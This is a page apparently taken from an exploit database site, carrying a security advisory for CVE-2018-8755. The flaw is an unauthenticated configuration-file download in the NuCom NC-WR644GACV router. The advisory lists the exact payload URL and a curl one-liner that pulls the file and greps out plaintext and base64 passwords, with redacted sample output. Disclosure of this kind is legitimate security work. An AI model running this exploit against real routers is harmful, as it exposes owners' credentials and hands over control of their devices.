0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
NuCom NC-WR644GACV Unauthenticated Configuration File Download Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Overview ======== Researchers of NVEL4 Cybersecurity company have discovered that it is possible to access to the config file bypassing admin authentication and authorization. The vulnerability has been reported to the vendor. The vendor has confirmed the vulnerability but not issued to security advisory. The recommendation to affected users is to update to the latest available version and change the credentials used, since they could have been extracted. Some NuCom routers are exposed to internet. Product Details ============= * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router) * Vendor: NuCom * Model Name: NC-WR644GACV * Vulnerable Software Version: <= STA 005 * Fixed Software Version: STA 006 Vulnerability Details =================== * CVE: 2018-8755 * Name: Unauthenticated Configuration File Download * Type: Authentication / Authorization Bypass * Description: An unauthorizated user can download config file by accessing to the URL directly * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download * Impact: By downloading the config file an attacker can read all password stored in plain-text and base64 then access vie web as administrator and gain privileged control of the device. * CVSS v3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N * CVSS v3 Score: 7.5 PoC ==== zerial@home:~$ curl -s "http://vulnerable.hostname/ cgi-bin/config_download.cgi?action=download"|strings|grep -i password InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN PASSWORD HERE] InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1. WANPPPConnection.1.Password=[BASE64 PASSWORD HERE] InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN TEXT PASSWORD HERE] InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN TEXT PASSWORD HERE] InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256 PASSWORD HERE] InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256 PASSWORD HERE] InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN TEXT PASSWORD HERE] InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE] InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64 PASSWORD HERE] zerial@home:~$ *** Sensitive information has been removed and replaced by [...] # 0day.today [2024-11-15] #